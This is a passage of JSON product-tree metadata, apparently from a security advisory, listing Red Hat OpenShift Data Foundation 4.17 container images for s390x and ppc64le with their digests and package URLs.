"name": "odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x",
"product": {
"name": "odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x",
"product_id": "odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x",
"product_identification_helper": {
"purl": "pkg:oci/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a?arch=s390x\u0026repository_url=registry.redhat.io/odf4/ocs-client-console-rhel9\u0026tag=v4.17.0-53"
}
}
},
{
"category": "product_version",
"name": "odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x",
"product": {
"name": "odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x",
"product_id": "odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x",
"product_identification_helper": {
"purl": "pkg:oci/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20?arch=s390x\u0026repository_url=registry.redhat.io/odf4/ocs-client-operator-bundle\u0026tag=v4.17.0-126"
}
}
},
{
"category": "product_version",
"name": "odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x",
"product": {
"name": "odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x",
"product_id": "odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x",
"product_identification_helper": {
"purl": "pkg:oci/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a?arch=s390x\u0026repository_url=registry.redhat.io/odf4/ocs-client-rhel9-operator\u0026tag=v4.17.0-31"
}
}
},
{
"category": "product_version",
"name": "odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x",
"product": {
"name": "odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x",
"product_id": "odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x",
"product_identification_helper": {
"purl": "pkg:oci/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e?arch=s390x\u0026repository_url=registry.redhat.io/odf4/ocs-metrics-exporter-rhel9\u0026tag=v4.17.0-66"
}
}
},
{
"category": "product_version",
"name": "odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x",
"product": {
"name": "odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x",
"product_id": "odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x",
"product_identification_helper": {
"purl": "pkg:oci/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c?arch=s390x\u0026repository_url=registry.redhat.io/odf4/ocs-operator-bundle\u0026tag=v4.17.0-126"
}
}
},
{
"category": "product_version",
"name": "odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x",
"product": {
"name": "odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x",
"product_id": "odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x",
"product_identification_helper": {
"purl": "pkg:oci/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3?arch=s390x\u0026repository_url=registry.redhat.io/odf4/ocs-rhel9-operator\u0026tag=v4.17.0-60"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x",
"product": {
"name": "odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x",
"product_id": "odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x",
"product_identification_helper": {
"purl": "pkg:oci/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932?arch=s390x\u0026repository_url=registry.redhat.io/odf4/odf-cli-rhel9\u0026tag=v4.17.0-29"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x",
"product": {
"name": "odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x",
"product_id": "odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x",
"product_identification_helper": {
"purl": "pkg:oci/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310?arch=s390x\u0026repository_url=registry.redhat.io/odf4/odf-console-rhel9\u0026tag=v4.17.0-53"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x",
"product": {
"name": "odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x",
"product_id": "odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x",
"product_identification_helper": {
"purl": "pkg:oci/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54?arch=s390x\u0026repository_url=registry.redhat.io/odf4/odf-cosi-sidecar-rhel9\u0026tag=v4.17.0-7"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x",
"product": {
"name": "odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x",
"product_id": "odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x",
"product_identification_helper": {
"purl": "pkg:oci/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076?arch=s390x\u0026repository_url=registry.redhat.io/odf4/odf-csi-addons-operator-bundle\u0026tag=v4.17.0-126"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x",
"product": {
"name": "odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x",
"product_id": "odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x",
"product_identification_helper": {
"purl": "pkg:oci/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e?arch=s390x\u0026repository_url=registry.redhat.io/odf4/odf-csi-addons-rhel9-operator\u0026tag=v4.17.0-30"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x",
"product": {
"name": "odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x",
"product_id": "odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x",
"product_identification_helper": {
"purl": "pkg:oci/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168?arch=s390x\u0026repository_url=registry.redhat.io/odf4/odf-csi-addons-sidecar-rhel9\u0026tag=v4.17.0-30"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x",
"product": {
"name": "odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x",
"product_id": "odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x",
"product_identification_helper": {
"purl": "pkg:oci/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c?arch=s390x\u0026repository_url=registry.redhat.io/odf4/odf-multicluster-console-rhel9\u0026tag=v4.17.0-53"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x",
"product": {
"name": "odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x",
"product_id": "odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x",
"product_identification_helper": {
"purl": "pkg:oci/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f?arch=s390x\u0026repository_url=registry.redhat.io/odf4/odf-multicluster-operator-bundle\u0026tag=v4.17.0-126"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x",
"product": {
"name": "odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x",
"product_id": "odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x",
"product_identification_helper": {
"purl": "pkg:oci/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af?arch=s390x\u0026repository_url=registry.redhat.io/odf4/odf-multicluster-rhel9-operator\u0026tag=v4.17.0-17"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x",
"product": {
"name": "odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x",
"product_id": "odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x",
"product_identification_helper": {
"purl": "pkg:oci/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61?arch=s390x\u0026repository_url=registry.redhat.io/odf4/odf-must-gather-rhel9\u0026tag=v4.17.0-14"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x",
"product": {
"name": "odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x",
"product_id": "odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x",
"product_identification_helper": {
"purl": "pkg:oci/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012?arch=s390x\u0026repository_url=registry.redhat.io/odf4/odf-operator-bundle\u0026tag=v4.17.0-126"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x",
"product": {
"name": "odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x",
"product_id": "odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x",
"product_identification_helper": {
"purl": "pkg:oci/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e?arch=s390x\u0026repository_url=registry.redhat.io/odf4/odf-rhel9-operator\u0026tag=v4.17.0-20"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x",
"product": {
"name": "odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x",
"product_id": "odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x",
"product_identification_helper": {
"purl": "pkg:oci/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7?arch=s390x\u0026repository_url=registry.redhat.io/odf4/odf-prometheus-operator-bundle\u0026tag=v4.17.0-126"
}
}
},
{
"category": "product_version",
"name": "odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x",
"product": {
"name": "odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x",
"product_id": "odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x",
"product_identification_helper": {
"purl": "pkg:oci/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5?arch=s390x\u0026repository_url=registry.redhat.io/odf4/odr-cluster-operator-bundle\u0026tag=v4.17.0-126"
}
}
},
{
"category": "product_version",
"name": "odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x",
"product": {
"name": "odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x",
"product_id": "odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x",
"product_identification_helper": {
"purl": "pkg:oci/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5?arch=s390x\u0026repository_url=registry.redhat.io/odf4/odr-hub-operator-bundle\u0026tag=v4.17.0-126"
}
}
},
{
"category": "product_version",
"name": "odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x",
"product": {
"name": "odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x",
"product_id": "odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x",
"product_identification_helper": {
"purl": "pkg:oci/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb?arch=s390x\u0026repository_url=registry.redhat.io/odf4/odr-rhel9-operator\u0026tag=v4.17.0-40"
}
}
},
{
"category": "product_version",
"name": "odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x",
"product": {
"name": "odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x",
"product_id": "odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x",
"product_identification_helper": {
"purl": "pkg:oci/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705?arch=s390x\u0026repository_url=registry.redhat.io/odf4/odr-recipe-operator-bundle\u0026tag=v4.17.0-126"
}
}
},
{
"category": "product_version",
"name": "odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x",
"product": {
"name": "odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x",
"product_id": "odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x",
"product_identification_helper": {
"purl": "pkg:oci/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497?arch=s390x\u0026repository_url=registry.redhat.io/odf4/rook-ceph-operator-bundle\u0026tag=v4.17.0-126"
}
}
},
{
"category": "product_version",
"name": "odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x",
"product": {
"name": "odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x",
"product_id": "odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x",
"product_identification_helper": {
"purl": "pkg:oci/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7?arch=s390x\u0026repository_url=registry.redhat.io/odf4/rook-ceph-rhel9-operator\u0026tag=v4.17.0-51"
}
}
}
],
"category": "architecture",
"name": "s390x"
},
{
"branches": [
{
"category": "product_version",
"name": "odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le",
"product": {
"name": "odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le",
"product_id": "odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161?arch=ppc64le\u0026repository_url=registry.redhat.io/odf4/cephcsi-rhel9\u0026tag=v4.17.0-46"
}
}
},
{
"category": "product_version",
"name": "odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le",
"product": {
"name": "odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le",
"product_id": "odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4?arch=ppc64le\u0026repository_url=registry.redhat.io/odf4/cephcsi-operator-bundle\u0026tag=v4.17.0-126"
}
}
},
{
"category": "product_version",
"name": "odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le",
"product": {
"name": "odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le",
"product_id": "odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202?arch=ppc64le\u0026repository_url=registry.redhat.io/odf4/cephcsi-rhel9-operator\u0026tag=v4.17.0-15"
}
}
},
{
"category": "product_version",
"name": "odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le",
"product": {
"name": "odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le",
"product_id": "odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348?arch=ppc64le\u0026repository_url=registry.redhat.io/odf4/mcg-core-rhel9\u0026tag=v4.17.0-69"
}
}
},
{
"category": "product_version",
"name": "odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le",
"product": {
"name": "odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le",
"product_id": "odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee?arch=ppc64le\u0026repository_url=registry.redhat.io/odf4/mcg-operator-bundle\u0026tag=v4.17.0-126"
}
}
},
{
"category": "product_version",
"name": "odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le",
"product": {
"name": "odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le",
"product_id": "odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55?arch=ppc64le\u0026repository_url=registry.redhat.io/odf4/mcg-rhel9-operator\u0026tag=v4.17.0-23"
}
}
},
{
"category": "product_version",
"name": "odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le",
"product": {
"name": "odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le",
"product_id": "odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc?arch=ppc64le\u0026repository_url=registry.redhat.io/odf4/ocs-client-console-rhel9\u0026tag=v4.17.0-53"
}
}
},
{
"category": "product_version",
"name": "odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le",
"product": {
"name": "odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le",
"product_id": "odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541?arch=ppc64le\u0026repository_url=registry.redhat.io/odf4/ocs-client-operator-bundle\u0026tag=v4.17.0-126"
}
}
},
{
"category": "product_version",
"name": "odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le",
"product": {
"name": "odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le",
"product_id": "odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c?arch=ppc64le\u0026repository_url=registry.redhat.io/odf4/ocs-client-rhel9-operator\u0026tag=v4.17.0-31"
}
}
},
{
"category": "product_version",
"name": "odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le",
"product": {
"name": "odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le",
"product_id": "odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a?arch=ppc64le\u0026repository_url=registry.redhat.io/odf4/ocs-metrics-exporter-rhel9\u0026tag=v4.17.0-66"
}
}
},
{
"category": "product_version",
"name": "odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le",
"product": {
"name": "odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le",
"product_id": "odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd?arch=ppc64le\u0026repository_url=registry.redhat.io/odf4/ocs-operator-bundle\u0026tag=v4.17.0-126"
}
}
},
{
"category": "product_version",
"name": "odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le",
"product": {
"name": "odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le",
"product_id": "odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0?arch=ppc64le\u0026repository_url=registry.redhat.io/odf4/ocs-rhel9-operator\u0026tag=v4.17.0-60"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le",
"product": {
"name": "odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le",
"product_id": "odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4?arch=ppc64le\u0026repository_url=registry.redhat.io/odf4/odf-cli-rhel9\u0026tag=v4.17.0-29"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le",
"product": {
"name": "odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le",
"product_id": "odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le",
"product_identification_helper": {
